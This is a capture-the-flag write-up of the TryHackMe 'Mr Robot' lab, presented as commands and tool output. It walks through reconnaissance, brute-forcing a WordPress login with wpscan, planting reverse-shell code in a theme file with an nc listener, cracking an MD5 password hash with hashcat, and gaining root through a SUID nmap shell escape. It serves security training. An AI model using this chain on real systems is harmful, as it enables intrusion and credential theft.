Date: 21, May, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
nmap -sC -sV -p- 10.10.79.200 -oN nmap-initial
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 11:07 IST
Nmap scan report for 10.10.79.200
Host is up (0.19s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesnt have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 905.32 seconds$ gobuster dir -u http://10.10.79.200/ -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.79.200/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/21 11:27:31 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.79.200/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.79.200/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.79.200/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.79.200/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.79.200/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/images (Status: 301) [Size: 235] [--> http://10.10.79.200/images/]
/Image (Status: 301) [Size: 0] [--> http://10.10.79.200/Image/]
/image (Status: 301) [Size: 0] [--> http://10.10.79.200/image/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.79.200/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.79.200/js/]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.79.200/]
/phpmyadmin (Status: 403) [Size: 94]
/readme (Status: 200) [Size: 64]
/rdf (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/rdf/]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.79.200/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.79.200/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.79.200/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.79.200/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-load (Status: 200) [Size: 0]
/wp-login (Status: 200) [Size: 2606]
/wp-mail (Status: 500) [Size: 3064]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
2021/05/21 12:04:41 Finished
===============================================================
- Visit robots.txt or robots:
User-agent: *
fsocity.dic
key-1-of-3.txt- Now we have the clue to obtain the key 1:
- Let's curl it down:
$ curl http://10.10.79.200/key-1-of-3.txt -o key1.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 33 100 33 0 0 95 0 --:--:-- --:--:-- --:--:-- 95
$ cat key1.txt
REDACTED$ wpscan --url http://10.10.79.200/ -v -o wpscan-verbose
$ cat wpscan-verbose
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.79.200/ [10.10.79.200]
[+] Started: Fri May 21 11:55:02 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.79.200/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.79.200/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] The external WP-Cron seems to be enabled: http://10.10.79.200/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.79.200/0bdcad3.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.79.200/0bdcad3.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.79.200/wp-content/themes/twentyfifteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://10.10.79.200/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.79.200/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.
| Author: the WordPress team
| Author URI: https://wordpress.org/
| License: GNU General Public License v2 or later
| License URI: http://www.gnu.org/licenses/gpl-2.0.html
| Tags: black, blue, gray, pink, purple, white, yellow, dark, light, two-columns, left-sidebar, fixed-layout, responsive-layout, accessibility-ready, custom-background, custom-colors, custom-header, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready
| Text Domain: twentyfifteen
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.79.200/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[i] No plugins Found.
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri May 21 11:57:46 2021
[+] Requests Done: 140
[+] Cached Requests: 39
[+] Data Sent: 34.919 KB
[+] Data Received: 53.111 KB
[+] Memory used: 204.859 MB
[+] Elapsed time: 00:02:43- In the robots.txt, we also find a dictionary file.
- On downloading, we find that it looks like some username/password file.
$ wget 10.10.79.200/fsocity.dic
--2021-05-21 12:00:07-- http://10.10.79.200/fsocity.dic
Connecting to 10.10.79.200:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=============================================================>] 6.91M 752KB/s in 16s
2021-05-21 12:00:23 (445 KB/s) - ‘fsocity.dic’ saved [7245381/7245381]- If you have watched Mr.Robot, you know that Elliot is the name of the protagonist.
- So, I enter Elliot:something as the username and password.
- And I was able to confirm that an user named Elliot existed.
- We know the username. We need to bruteforce the password.
- We can use fsocity.dic as the wordlist. But the file is very large.
- Try to fetch only the unique values using
sort -u. - Apparently, the file size was drastically reduced (8.5 lakh values -> 11K values). Easy for bruteforcing!
$ wc -l fsocity.dic
858160 fsocity.dic
$ sort -u fsocity.dic > uniq-fscoity.dic
$ wc -l uniq-fscoity.dic
11451 uniq-fscoity.dic- Using
wpscanfor bruteforcing the password:
$ wpscan --url http://10.10.25.251 -t 50 -U Elliot -P uniq-fscoity.dic
.
.
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
Progress Time: 00:00:00 < > (0 / 22) 0.00% ETA: ??:??:??
[SUCCESS] - Elliot / REDACTED
All Found
Progress Time: 00:07:35 <========================================== > (12 / 22) 54.54% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: Elliot, Password: REDACTED
.
.- Login using
Elliot:REDACTEDcredentials to access the admin panel.
- Modify
404.phpor any other page of the theme and add reverse shell code.
- Listen on the appropriate port using
ncto obtain a reverse shell:
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.17.7.91] from (UNKNOWN) [10.10.25.251] 38633
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
09:14:25 up 1:10, 0 users, load average: 0.01, 1.47, 4.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon- Upgrade the shell
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$ export TERM=xterm
export TERM=xterm
daemon@linux:/$ ^Z
[1]+ Stopped nc -lvnp 1234
root@kali:~/Desktop/CTF/TryHackMe/mr_robot_ctf# stty raw -echo; fg
nc -lvnp 1234
daemon@linux:/$ ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
daemon@linux:/$ cd - The key 2 file is located in robot user's directory.
- But the permission is denied.
- Still we can find the md5 hash of robot's password.
daemon@linux:/$ cd home
daemon@linux:/home$ ls
robot
daemon@linux:/home$ cd robot/
daemon@linux:/home/robot$ ls
key-2-of-3.txt password.raw-md5
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ file key-2-of-3.txt
key-2-of-3.txt: regular file, no read permission
sudo: 1 incorrect password attempt
daemon@linux:/home/robot$ cat password.raw-md5
robot:REDACTED- Cracking the hash using
hashcat:
hashcat REDACTED /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2886/2950 MB (1024 MB allocatable), 1MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Host memory required for this attack: 64 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
REDACTED:REDACTED
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: REDACTED
Time.Started.....: Fri May 21 14:49:39 2021 (1 sec)
Time.Estimated...: Fri May 21 14:49:40 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 437.2 kH/s (1.46ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 40960/14344385 (0.29%)
Rejected.........: 0/40960 (0.00%)
Restore.Point....: 39936/14344385 (0.28%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: promo2007 -> loserface1- Switching to robot user using the cracked password & obtaining the key:
daemon@linux:/home/robot$ su robot
Password:
robot@linux:~$ whoami
robot
robot@linux:~$ cat key-2-of-3.txt
REDACTED- Robot user doesn't have sudo rights:
robot@linux:/$ sudo -l
[sudo] password for robot:
Sorry, user robot may not run sudo on linux.- Linpeas gave away the Privilege Escalation vector easily:
nmap
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
.
.
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
.
.- By running nmap in interactive mode, we can spawn a shell using
!sh. - Since the SUID bit is set, the spawned shell will have root access.
robot@linux:/dev/shm$ nmap -V
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:/dev/shm$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> help
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
nmap> !sh
# whoami
root# cd /root
# ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
REDACTED